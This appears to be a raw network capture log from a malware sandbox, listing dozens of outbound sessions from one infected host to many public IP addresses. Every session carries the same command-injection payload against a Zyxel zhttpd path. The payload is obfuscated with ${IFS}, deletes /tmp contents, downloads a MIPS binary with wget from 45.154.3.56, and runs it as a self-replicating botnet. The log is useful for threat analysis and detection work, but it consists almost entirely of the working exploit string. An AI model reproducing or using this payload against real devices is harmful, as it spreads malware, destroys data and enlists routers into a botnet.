                        Mar 12, 2024 08:50:32.103266001 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1649192.168.2.144523046.155.121.199443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.103312969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1650192.168.2.145423453.123.88.231443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.103338957 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1651192.168.2.1441154198.25.163.228443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.103372097 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1652192.168.2.1441726132.197.142.126443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.103430033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1653192.168.2.1436758205.159.177.91443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.103457928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1654192.168.2.143408884.112.39.28443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.103488922 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1655192.168.2.1450888201.174.14.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.103540897 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1656192.168.2.1433202118.11.160.0443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:33.107922077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1657192.168.2.1442296124.33.198.132443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.116961002 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1658192.168.2.144787298.77.157.65443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117007971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1659192.168.2.1434760150.128.234.197443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117041111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1660192.168.2.1455200169.153.229.55443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117136955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1661192.168.2.1443286163.228.93.21443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117141962 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1662192.168.2.1453224202.235.6.158443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117191076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1663192.168.2.1455822178.202.161.105443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117264986 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1664192.168.2.144365479.246.13.63443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117295980 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1665192.168.2.1456964221.123.188.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117350101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1666192.168.2.1437694146.85.133.59443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117393017 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1667192.168.2.1446888145.68.177.67443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117418051 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1668192.168.2.145178275.84.58.96443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117465019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1669192.168.2.144608417.74.255.132443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117496967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1670192.168.2.145223836.136.230.50443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117537022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1671192.168.2.1460378178.41.255.121443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117571115 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1672192.168.2.1456576143.98.214.50443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117624998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1673192.168.2.1450898143.211.178.158443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117676020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1674192.168.2.1436028155.144.13.114443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117705107 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1675192.168.2.145118014.222.86.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117782116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1676192.168.2.1435538156.221.250.136443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117805958 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1677192.168.2.145802044.113.93.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117849112 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1678192.168.2.1434198137.11.214.180443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117912054 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1679192.168.2.143684843.2.255.68443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.117938995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1680192.168.2.1436724183.246.253.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118002892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1681192.168.2.144423070.42.233.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118021965 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1682192.168.2.143487066.215.45.206443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118061066 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1683192.168.2.1436428222.65.77.33443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118155003 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1684192.168.2.144852463.92.165.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118166924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1685192.168.2.1453728110.137.80.49443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118194103 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1686192.168.2.144345047.7.126.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118238926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1687192.168.2.1448756165.184.155.220443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118302107 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1688192.168.2.143898817.237.133.110443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118335009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1689192.168.2.1452032167.4.52.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118386984 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1690192.168.2.1442916210.46.209.124443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118459940 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1691192.168.2.1438292200.48.31.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118463039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1692192.168.2.1451142179.170.80.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118527889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1693192.168.2.145038688.112.237.247443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118541002 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1694192.168.2.1438080155.193.136.42443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118608952 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1695192.168.2.145424225.62.229.39443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118639946 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1696192.168.2.143838264.61.231.142443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118689060 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1697192.168.2.1434380120.200.206.26443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118730068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1698192.168.2.1455482195.218.220.201443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118771076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1699192.168.2.145318238.102.142.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118794918 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1700192.168.2.143799261.134.78.22443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118849039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1701192.168.2.1435754140.131.183.116443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118900061 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1702192.168.2.1433832223.178.140.166443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118947983 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1703192.168.2.1444080213.117.96.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.118973970 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1704192.168.2.1445590205.98.200.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119004011 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1705192.168.2.144271041.226.173.17443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119043112 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1706192.168.2.1456586149.177.181.15443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119093895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1707192.168.2.144909257.226.197.167443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119127035 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1708192.168.2.143672253.228.154.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119168043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1709192.168.2.1439370136.202.110.52443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119220018 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1710192.168.2.1448606113.43.0.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119257927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1711192.168.2.1444002171.17.66.199443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119313002 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1712192.168.2.1457294104.61.251.94443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119352102 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1713192.168.2.14441064.245.147.27443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119410992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1714192.168.2.144902278.122.156.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119446039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1715192.168.2.144793654.206.71.250443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119499922 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1716192.168.2.1442006135.249.44.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119534969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1717192.168.2.144364069.69.225.117443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119585037 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
